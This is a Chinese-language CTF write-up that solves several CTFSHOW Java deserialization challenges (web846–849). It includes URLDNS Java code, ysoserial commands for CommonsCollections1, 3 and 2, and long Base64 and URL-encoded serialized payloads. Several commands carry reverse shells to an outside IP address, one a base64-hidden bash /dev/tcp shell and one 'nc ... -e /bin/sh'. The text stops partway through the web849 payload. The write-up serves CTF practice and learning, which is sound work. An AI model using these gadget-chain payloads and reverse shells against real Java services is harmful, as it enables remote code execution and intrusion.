
【Web】CTFSHOW java反序列化刷题记录(部分)

【Web】CTFSHOW java反序列化刷题记录(部分)

目录

web846

web847

web848

web849

web850

web856

web857

web858


web846

直接用 URLDNS 链即可。这条链只会在反序列化时触发一次 DNS 解析,不会执行命令,因此通常用来确认目标确实对传入的数据做了反序列化。

  1. import java.io.ByteArrayOutputStream;
  2. import java.io.IOException;
  3. import java.io.ObjectOutput;
  4. import java.io.ObjectOutputStream;
  5. import java.lang.reflect.Field;
  6. import java.net.URL;
  7. import java.util.Base64;
  8. import java.util.HashMap;
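  /**
   * Builds the "URLDNS" serialized object graph and prints it Base64-encoded.
   *
   * <p>The graph is a {@link HashMap} holding a single {@link URL} key whose cached
   * {@code hashCode} field is -1. When a receiver deserializes it,
   * {@code HashMap.readObject} re-hashes the key, {@code URL.hashCode()} sees the
   * "not yet computed" marker and recomputes the hash, which resolves the host name.
   * The only observable effect on the receiver is a DNS lookup; no code is executed.
   *
   * <p>Defensive notes: the lookup relies on JDK classes only, so removing gadget
   * libraries from the classpath does not prevent it. The fix on the receiving side is
   * to stop deserializing untrusted bytes, or to install an allow-list serialization
   * filter (JEP 290, {@code java.io.ObjectInputFilter} on JDK 9+) that rejects classes
   * the endpoint does not need. An application server resolving a host name it has no
   * reason to contact right after handling a request is a useful detection signal.
   */
  public class URLDNS {

    /**
     * Serializes {@code obj} with Java native serialization and prints the result to
     * standard output as one Base64 line.
     *
     * @param obj object graph to serialize; must be {@link java.io.Serializable}
     * @throws IOException if {@code obj} cannot be written (for example, it is not
     *     serializable)
     */
    public static void serialize(Object obj) throws IOException {
      ByteArrayOutputStream data = new ByteArrayOutputStream();
      // try-with-resources closes the stream even when writeObject throws.
      try (ObjectOutput oos = new ObjectOutputStream(data)) {
        oos.writeObject(obj);
        oos.flush();
      }
      System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    }

    /**
     * Builds the HashMap/URL graph for the challenge host and prints it.
     *
     * @param args unused
     * @throws Exception on reflection or serialization failure
     */
    public static void main(String[] args) throws Exception {
      URL url = new URL("http://68421999-595d-43ef-bbd8-f10c88147a01.challenge.ctf.show/");

      // URL caches its hash in the private field "hashCode"; -1 means "not computed".
      // NOTE(review): on JDK 16+ setAccessible on java.net.URL is expected to throw
      // InaccessibleObjectException unless java.base/java.net is opened (--add-opens).
      Field hashCodeField = url.getClass().getDeclaredField("hashCode");
      hashCodeField.setAccessible(true);

      // Pre-set a dummy hash so that put() below does not resolve the host locally
      // while the graph is being built.
      hashCodeField.set(url, 1);

      HashMap<URL, Integer> map = new HashMap<URL, Integer>();
      map.put(url, 1);

      // Restore the "not computed" marker; this value is what gets serialized, so the
      // receiver recomputes the hash (and resolves the host) during readObject.
      hashCodeField.set(url, -1);

      serialize(map);
    }
  }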

payload:

ctfshow=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//3QANzY4NDIxOTk5LTU5NWQtNDNlZi1iYmQ4LWYxMGM4ODE0N2EwMS5jaGFsbGVuZ2UuY3RmLnNob3d0AAEvcQB+AAV0AARodHRwcHhzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXg=

也可直接用ysoserial

java -jar ysoserial.jar URLDNS "http://712840a9-ddc9-49a5-9e08-b29d74fe9910.challenge.ctf.show/"|base64

web847

有关CC链:CC链 1-7 分析 - 先知社区

题目提示:

用CC1打就行

先生成反弹shell的payload:

java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

将生成的 payload 放到 Burp Suite 自带的 Decoder 里做一次 URL 全编码(Base64 中的 +、/、= 在 URL 参数里有特殊含义,不编码的话传参时会被改写)

get方式传参

监听,成功反弹shell

web848

TransformedMap也被ban了,CC1不能打了,换CC3

java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

与上一题相比只有一点不同:payload 需要用 POST 传参,因为用 GET 传参时 payload 过长会报错;其余流程都一样

payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%44%4a%7a%64%57%34%75%63%6d%56%6d%62%47%56%6a%64%43%35%68%62%6d%35%76%64%47%46%30%61%57%39%75%4c%6b%46%75%62%6d%39%30%59%58%52%70%62%32%35%4a%62%6e%5a%76%59%32%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6c%58%4b%39%51%38%56%79%33%36%6c%41%67%41%43%54%41%41%4d%62%57%56%74%59%6d%56%79%56%6d%46%73%64%57%56%7a%64%41%41%50%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%4e%59%58%41%37%54%41%41%45%64%48%6c%77%5a%58%51%41%45%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%7a%66%51%41%41%41%41%45%41%44%57%70%68%64%6d%45%75%64%58%52%70%62%43%35%4e%59%58%42%34%63%67%41%58%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6e%4a%6c%5a%6d%78%6c%59%33%51%75%55%48%4a%76%65%48%6e%68%4a%39%6f%67%7a%42%42%44%79%77%49%41%41%55%77%41%41%57%68%30%41%43%56%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%33%4a%6c%5a%6d%78%6c%59%33%51%76%53%57%35%32%62%32%4e%68%64%47%6c%76%62%6b%68%68%62%6d%52%73%5a%58%49%37%65%48%42%7a%63%51%42%2b%41%41%42%7a%63%67%41%71%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%31%68%63%43%35%4d%59%58%70%35%54%57%46%77%62%75%57%55%67%70%35%35%45%4a%51%44%41%41%46%4d%41%41%64%6d%59%57%4e%30%62%33%4a%35%64%41%41%73%54%47%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%59%32%39%74%62%57%39%75%63%79%39%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%39%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%74%34%63%48%4e%79%41%44%70%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%74%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%76%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%65%48%42%31
%63%67%41%74%57%30%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%76%56%59%71%38%64%67%30%47%4a%6b%43%41%41%42%34%63%41%41%41%41%41%4a%7a%63%67%41%37%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%35%6d%64%57%35%6a%64%47%39%79%63%79%35%4a%62%6e%4e%30%59%57%35%30%61%57%46%30%5a%56%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4e%49%76%30%66%36%53%47%30%44%73%43%41%41%4a%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%62%41%41%74%70%55%47%46%79%59%57%31%55%65%58%42%6c%63%33%51%41%45%6c%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%4e%73%59%58%4e%7a%4f%33%68%77%64%58%49%41%45%31%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%69%61%6d%56%6a%64%44%75%51%7a%6c%69%66%45%48%4d%70%62%41%49%41%41%48%68%77%41%41%41%41%41%58%4e%79%41%44%70%6a%62%32%30%75%63%33%56%75%4c%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%65%47%46%73%59%57%34%75%61%57%35%30%5a%58%4a%75%59%57%77%75%65%48%4e%73%64%47%4d%75%64%48%4a%68%65%43%35%55%5a%57%31%77%62%47%46%30%5a%58%4e%4a%62%58%42%73%43%56%64%50%77%57%36%73%71%7a%4
d%44%41%41%5a%4a%41%41%31%66%61%57%35%6b%5a%57%35%30%54%6e%56%74%59%6d%56%79%53%51%41%4f%58%33%52%79%59%57%35%7a%62%47%56%30%53%57%35%6b%5a%58%68%62%41%41%70%66%59%6e%6c%30%5a%57%4e%76%5a%47%56%7a%64%41%41%44%57%31%74%43%57%77%41%47%58%32%4e%73%59%58%4e%7a%63%51%42%2b%41%42%68%4d%41%41%56%66%62%6d%46%74%5a%58%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%30%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%2b%63%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%
33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a
%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%41%43%34%42%41%47%46%69%59%58%4e%6f%49%43%31%6a%49%48%74%6c%59%32%68%76%4c%46%6c%74%52%6e%70%68%51%30%46%30%59%56%4e%42%4b%30%70%70%51%58%5a%61%52%31%59%79%54%44%4e%53%61%6d%4e%44%4f%48%68%4e%61%6c%46%31%54%57%70%4a%65%55%78%71%52%58%70%4f%61%54%52%36%54%58%6b%34%65%45%31%36%54%54%4e%4a%52%45%45%72%53%6d%70%46%50%58%31%38%65%32%4a%68%63%32%55%32%4e%43%77%74%5a%48%31%38%65%32%4a%68%63%32%67%73%4c%57%6c%39%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%6
8%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%44%63%78%4d%6a%51%35%4d%7a%41%32%4d%54%45%34%4d%67%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%54%51%30%4e%7a%45%79%4e%44%6b%7a%4d%44%59%78%4d%54%67%79%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%49%77%41%41%41%64%54%4b%2f%72%71%2b%41%
41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%41%51%42%34%64%58%49%41%45%6c%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%4e%73%59%58%4e%7a%4f%36%73%57
%31%36%37%4c%7a%56%71%5a%41%67%41%41%65%48%41%41%41%41%41%42%64%6e%49%41%48%57%70%68%64%6d%46%34%4c%6e%68%74%62%43%35%30%63%6d%46%75%63%32%5a%76%63%6d%30%75%56%47%56%74%63%47%78%68%64%47%56%7a%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%4e%79%41%42%46%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%53%47%46%7a%61%45%31%68%63%41%55%48%32%73%48%44%46%6d%44%52%41%77%41%43%52%67%41%4b%62%47%39%68%5a%45%5a%68%59%33%52%76%63%6b%6b%41%43%58%52%6f%63%6d%56%7a%61%47%39%73%5a%48%68%77%50%30%41%41%41%41%41%41%41%41%42%33%43%41%41%41%41%42%41%41%41%41%41%41%65%48%68%32%63%67%41%53%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%32%5a%58%4a%79%61%57%52%6c%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%45%41%66%67%41%75

web849

 用CC2打

然后用nc来反弹shell

nc 124.222.136.33 1337 -e /bin/sh
java -jar ysoserial.jar CommonsCollections2 "nc 124.222.136.33 1337 -e /bin/sh "|base64 

最终payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%42%64%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%55%48%4a%70%62%33%4a%70%64%48%6c%52%64%57%56%31%5a%5a%54%61%4d%4c%54%37%50%34%4b%78%41%77%41%43%53%51%41%45%63%32%6c%36%5a%55%77%41%43%6d%4e%76%62%58%42%68%0a%63%6d%46%30%62%33%4a%30%41%42%5a%4d%61%6d%46%32%59%53%39%31%64%47%6c%73%4c%30%4e%76%62%58%42%68%63%6d%46%30%62%33%49%37%65%48%41%41%41%41%41%43%63%33%49%41%51%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%0a%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%61%57%35%6e%51%32%39%74%63%47%46%79%59%58%52%76%63%69%2f%35%68%50%41%72%73%51%6a%4d%0a%41%67%41%43%54%41%41%4a%5a%47%56%6a%62%33%4a%68%64%47%56%6b%63%51%42%2b%41%41%46%4d%41%41%74%30%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6e%51%41%4c%55%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%0a%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%4c%31%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4f%33%68%77%63%33%49%41%51%47%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%0a%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%51%32%39%74%63%47%46%79%59%57%4a%73%5a%55%4e%76%62%58%42%68%63%6d%46%30%62%33%4c%37%39%4a%6b%6c%75%47%36%78%4e%77%49%41%41%48%68%77%63%33%49%41%4f%32%39%79%0a%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%53%57%35%32%62%32%74%6c%63%6c%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%0a%68%2b%6a%2f%61%33%74%38%7a%6a%67%43%41%41%4e%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%4d%41%41%74%70%54%57%56%30%61%47%39%6b%54%6d%46%74%5a%58%51%41%0a%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%31%73%41%43%32%6c%51%59%58%4a%68%62%56%52%35%63%47%56%7a%64%41%41%53
